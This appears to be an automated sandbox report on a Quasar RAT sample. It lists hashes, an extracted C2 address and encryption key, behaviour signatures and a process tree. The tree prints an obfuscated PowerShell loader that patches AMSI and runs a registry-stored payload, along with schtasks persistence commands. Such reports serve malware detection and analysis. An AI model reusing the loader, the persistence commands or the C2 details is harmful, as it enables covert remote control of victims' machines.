Analysis

  • max time kernel
    1800s
  • max time network
    1799s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-05-2024 20:56

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 58 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:644
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:548
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e16fb6f9-7e6e-4a23-9bb0-e73336ed6a78}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:564
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:696
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1000
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:784
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:728
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1068
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1164
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1180
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1188
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SeIPJbhRqxIN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ptEsPhBLUzpzoG,[Parameter(Position=1)][Type]$dQIJaLCtuM)$mlJEnauEFjn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+'D'+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+'ryM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+'T'+'y'+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,Pub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Se'+'a'+''+'l'+'e'+'d'+''+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'A'+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$mlJEnauEFjn.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+'ia'+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+'g'+','+''+'P'+'ublic',[Reflection.CallingConventions]::Standard,$ptEsPhBLUzpzoG).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'ime'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$mlJEnauEFjn.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$dQIJaLCtuM,$ptEsPhBLUzpzoG).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Ma'+'n'+''+'a'+''+'g'+'e'+'d'+'');Write-Output $mlJEnauEFjn.CreateType();}$VYzijRikQprMT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$PyvnCFiMSBdjXK=$VYzijRikQprMT.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+'A'+''+[Char](100)+'dr'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dWsSFVvgDIZjcBbxbiJ=SeIPJbhRqxIN @([String])([IntPtr]);$wQOpFzwnrsWwYZTPNPVJuK=SeIPJbhRqxIN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YSbIPAKzgXb=$VYzijRikQprMT.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+'dul'+[Char](101)+''+[Char](72)+''+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$qPQhcWZBTMymOB=$PyvnCFiMSBdjXK.Invoke($Null,@([Object]$YSbIPAKzgXb,[Object]('Load'+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$lrlZgbfYOMsfUWnce=$PyvnCFiMSBdjXK.Invoke($Null,@([Object]$YSbIPAKzgXb,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+'c'+'t')));$WPkMYvR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qPQhcWZBTMymOB,$dWsSFVvgDIZjcBbxbiJ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+'.'+'d'+[Char](108)+''+[Char](108)+'');$pfssJRCWdHEMXKGWa=$PyvnCFiMSBdjXK.Invoke($Null,@([Object]$WPkMYvR,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+'fe'+[Char](114)+'')));$CyIonbDHRK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lrlZgbfYOMsfUWnce,$wQOpFzwnrsWwYZTPNPVJuK).Invoke($pfssJRCWdHEMXKGWa,[uint32]8,4,[ref]$CyIonbDHRK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pfssJRCWdHEMXKGWa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lrlZgbfYOMsfUWnce,$wQOpFzwnrsWwYZTPNPVJuK).Invoke($pfssJRCWdHEMXKGWa,[uint32]8,0x20,[ref]$CyIonbDHRK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+'W'+'A'+''+'R'+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+'t'+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3000
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1332
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Drops file in System32 directory
                            PID:1412
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1420
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1504
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1516
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1528
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:1348
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1700
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1764
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1844
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1860
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1992
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1136
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1248
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2032
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2040
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2192
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2320
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2392
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                              • Drops file in System32 directory
                                                              PID:2504
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2512
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2624
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2636
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2652
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2660
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2672
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                        1⤵
                                                                          PID:2700
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:692
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:2764
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3356
                                                                              • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                2⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3520
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:340
                                                                                • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:772
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                    4⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4752
                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1544
                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                  "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1036
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                              1⤵
                                                                                PID:3484
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                1⤵
                                                                                  PID:3540
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3868
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3948
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:4000
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                      1⤵
                                                                                        PID:4044
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                        1⤵
                                                                                          PID:4252
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4412
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4688
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1212
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4588
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:948
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4848
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:1684
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:2204
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:2452
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                        1⤵
                                                                                                          PID:3348
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4584
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1352
                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                            1⤵
                                                                                                              PID:4800
                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                C:\Windows\system32\WerFault.exe -u -p 4800 -s 944
                                                                                                                2⤵
                                                                                                                • Checks processor information in registry
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:2840
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:3376
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                              1⤵
                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                              PID:1260
                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 412 -p 4800 -ip 4800
                                                                                                                2⤵
                                                                                                                  PID:436
                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                1⤵
                                                                                                                  PID:3992
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                  1⤵
                                                                                                                    PID:1560
                                                                                                                  • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                    1⤵
                                                                                                                      PID:224
                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                      1⤵
                                                                                                                        PID:4856
                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                        1⤵
                                                                                                                          PID:2236

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.38f0f3a8-3258-4ec2-bfe0-5570907c2cbc.tmp.csv

                                                                                                                          Filesize

                                                                                                                          35KB

                                                                                                                          MD5

                                                                                                                          daef61dfcc2c592de663cb2424ce3495

                                                                                                                          SHA1

                                                                                                                          f75dbab3c551533e1f2443492911b83092527815

                                                                                                                          SHA256

                                                                                                                          bda1bfebe70374b222f2b0e7ed8346dad1b8c69795b4de62b2ca5b2541ad41a8

                                                                                                                          SHA512

                                                                                                                          9087ea4c6f704888a29795d0933ca1d4c32f8c13c50ce3da62933f13bf9648f0f5ffd41472406731c83efa97670a253cb110dac3b701bcadc0bbb8d24b915eb7

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d471e6f7-3dcf-4bb4-828e-3168282b221b.tmp.txt

                                                                                                                          Filesize

                                                                                                                          13KB

                                                                                                                          MD5

                                                                                                                          cca3ad4c864ee690886aa04c9115db7a

                                                                                                                          SHA1

                                                                                                                          c39cb41240ed64d46bedeb3fae615f6187a75c2e

                                                                                                                          SHA256

                                                                                                                          b1561032e5cce93e6a5ac74bc3f26e7ea1cbd35987d29e42e588f3ec0d9f817c

                                                                                                                          SHA512

                                                                                                                          47f946f13a0ecd3a75ad5c95314eb2de53db9773db8467a3cab596fc89ad462b6ad97c1e776946e896c3e7024fd3324e279585ac0c83fd164aece0f4c4689613

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                                                                                                                          Filesize

                                                                                                                          404B

                                                                                                                          MD5

                                                                                                                          b050f3eb74c1253558cc06462618007e

                                                                                                                          SHA1

                                                                                                                          1030b35fbc9ac6ac0d8d04648a2dfb1af2d3bc0d

                                                                                                                          SHA256

                                                                                                                          6c7cb80a29df5cabbf9460f6d8ace6ded951b677ef140154947b36b63b654b1a

                                                                                                                          SHA512

                                                                                                                          ddee9a81c4d2c434aeae6ab0860ab08c40137e47c0147026b4f476ffceec69f46f94b077dd0340f38b85ce7223ea5e6cee0765242002b25b6a9d012d1d21148f

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                          Filesize

                                                                                                                          162KB

                                                                                                                          MD5

                                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                          SHA1

                                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                          SHA256

                                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                          SHA512

                                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe

                                                                                                                          Filesize

                                                                                                                          409KB

                                                                                                                          MD5

                                                                                                                          a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                                          SHA1

                                                                                                                          3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                                          SHA256

                                                                                                                          43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                                          SHA512

                                                                                                                          458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_41x42q5o.1nt.ps1

                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                                          Filesize

                                                                                                                          412B

                                                                                                                          MD5

                                                                                                                          9c41c26a85453c5a9c13348983ea766d

                                                                                                                          SHA1

                                                                                                                          1de4615ffd8883434eb023e74897166fa7961297

                                                                                                                          SHA256

                                                                                                                          d67ebd1b74b64a9ff245b07a6de10eefbff3407f8fe0f06ca4b47b21a86d8c3c

                                                                                                                          SHA512

                                                                                                                          e870fb6b023b938d5b9e09aec2676323a1a59b56ce110603511466c3f70fc1b5ec2829e0b4912609c90f480e254c9c4e308d0daabc0c9b7bd695630f5239c0ff

                                                                                                                        • memory/548-88-0x00007FFAD5270000-0x00007FFAD5280000-memory.dmp

                                                                                                                          Filesize

